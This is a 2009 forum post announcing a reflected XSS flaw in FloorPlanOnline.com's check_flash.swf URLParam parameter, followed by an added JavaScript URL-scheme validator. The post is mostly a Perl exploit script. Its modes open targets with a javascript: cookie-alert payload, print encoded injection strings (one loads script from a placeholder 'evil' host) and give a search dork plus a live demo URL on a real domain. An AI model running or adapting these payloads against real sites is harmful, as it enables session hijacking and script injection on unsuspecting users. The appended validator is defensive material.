FloorPlanOnLine.com Remote XSS Vulnerability

Post by kmkz » Sat Feb 07, 2009 3:06 pm

[code:1:d7acacbdbc]#!/usr/local/bin/perl -w

use strict;
use warnings;
use Getopt::Std;
use IO::Socket::INET;



my %options;
getopts('TeE', \%options) ;

my $test = $options{T};
my $encode = $options{e};
my $exploit = $options{E};



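# -T: open the target with the test string appended, in a local Firefox
if ($test)
{
    my @target = @ARGV;
    if (@target == 0)
    {
        usage();    # usage() dies, so nothing below runs without a target
    }

    my $files = 'javascript:alert:document.cookie';

    #--------------------------------------------------------------------------------

    # PeerAddr (not PeerAdr) is the option IO::Socket::INET reads for the remote host
    my $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "@target", PeerPort => "80")
        || die " [-] Target not found (!)\n\n";
    close($socket);    # the socket only served as a reachability check
    my $url = "@target$files";

    print "[+] Connecting to @target .... \n\n ";
    print "\n\n\r
[*]...Exploit Done!\n\n";

    # List form of system() keeps the shell from interpreting characters in the URL
    system('firefox', $url);
}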

elsif($encode)
{
print "/-------------------------------------------------------------------------------------\

[+] Bug: Remote Xss
[+] By: kmkz (c)
[+] Email : kmkz[at]live[dot]fr
[+] D0rk :Powered by FloorPlanOnline.com


--------------------------------------------------------------------------------------
[*]demo: http://vifp.com/p/check_flash.swf?URLParam=javascript:alert(document.cookie);
--------------------------------------------------------------------------------------
[+]kmkz's web site : http://kmkz-web-blog.blogspot.com
/-------------------------------------------------------------------------------------/\n\n";



print "
@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ Encoded XSS Injections @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@


(1) Cookie --> javascript%3Aalert%3Adocument.cookie\n\n
(2) Inclusion of evil Script --> %3C%20script%20src=%20[http://www.you-evil-site/bad.js]%20%3E%3C/script%3E \n\n
(3) Image Inclusion --> %3Cscript+type%3D%22text%2Fjavascript%22%3Edocument.image%5B0%5D.src%3D%22http%3A%2F%2F[your_site.com]%2F[image.jpg]%22%3B%3C%2Fscript%3E \n\n\n";
exit(1);



}


# elsif, so that -T and -e do not fall through to the "Missing Argument" branch
elsif($exploit)
{
print "/-------------------------------------------------------------------------------------\

[+] Bug: Remote Xss
[+] By: kmkz (c)
[+] Email : kmkz[at]live[dot]fr
[+] D0rk :Powered by FloorPlanOnline.com

--------------------------------------------------------------------------------------

[*]Can be exploited by malicious people to conduct cross-site scripting attacks.

-Input passed to the (URLPARAM) variable is not properly sanitised before
being returned to the user.


-This bug can be exploited to execute arbitrary script code in a user's browser
session in context of an affected site.

--------------------------------------------------------------------------------------
[*]demo: http://vifp.com/p/check_flash.swf?URLParam=javascript:alert(document.cookie);
--------------------------------------------------------------------------------------
[+]kmkz's web site : http://kmkz-web-blog.blogspot.com
/-------------------------------------------------------------------------------------/\n\n";
exit(1);
}

else{
print "[-] Missing Argument (!) \n";
usage();
exit;
}





sub usage{
print"\n";
die <<EOF;
Usage: $0 [-T <target> | -e | -E]


-T (Target) : test a defined target (url)
-e (encode) : give examples of encoded XSS injection
-E (Exploit): to see my original exploit (available on Milw0rm )

-----------------------------------------------------------

Contact "kmkz" for more information.

Mail: kmkz[at]live[dot]fr.
WebSite: http://kmkz-web-blog.blogspot.com
Board: www.collective-utopia.no-ip.fr
EOF
}[/code:1:d7acacbdbc]
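
The fix side of the bug described in the post, as an added example that is not part of the original post or the author's code: a URL-valued parameter such as URLParam is checked against a scheme allowlist at every percent-decoding layer before it is used as a navigation target. The function names, the decoding limit and the example.com URL are assumptions.

```javascript
// Added example, not code from the original post. All names are hypothetical.
const ALLOWED_SCHEMES = new Set(["http:", "https:"]);
const MAX_DECODE_ROUNDS = 3;
const FORBIDDEN = /[<>"'\u0000-\u001f\u007f]/; // markup and control characters

// Scheme as the WHATWG URL parser sees it (lower-cased, leading spaces
// stripped), or null when the value is not an absolute URL.
function schemeOf(value) {
  try {
    return new URL(value).protocol;
  } catch (e) {
    return null;
  }
}

// Returns { ok: true, url } or { ok: false, reason }.
function checkUrlParam(raw) {
  if (typeof raw !== "string" || raw === "") {
    return { ok: false, reason: "empty" };
  }
  // Check the value as received and after every further percent-decoding
  // round, so an encoded scheme or tag cannot survive to a later decoder.
  let layer = raw;
  for (let round = 0; ; round++) {
    if (FORBIDDEN.test(layer)) return { ok: false, reason: "forbidden-character" };
    const scheme = schemeOf(layer);
    if (scheme !== null && !ALLOWED_SCHEMES.has(scheme)) {
      return { ok: false, reason: "scheme " + scheme };
    }
    let next;
    try {
      next = decodeURIComponent(layer);
    } catch (e) {
      return { ok: false, reason: "bad-encoding" };
    }
    if (next === layer) break; // fully decoded
    if (round === MAX_DECODE_ROUNDS) return { ok: false, reason: "too-many-layers" };
    layer = next;
  }
  // Only an absolute http(s) URL, as received, is accepted.
  if (schemeOf(raw) === null) return { ok: false, reason: "not-absolute-url" };
  return { ok: true, url: new URL(raw).href };
}

// Constructed sample inputs; the second and third strings appear in the post.
for (const sample of ["http://example.com/tour?id=42",
  "javascript:alert(document.cookie);",
  "javascript%3Aalert%3Adocument.cookie"]) {
  console.log(JSON.stringify(sample), "->", JSON.stringify(checkUrlParam(sample)));
}
```

The allowlist is applied to the parsed scheme rather than to a string prefix, so case changes and leading whitespace in the value do not alter the verdict.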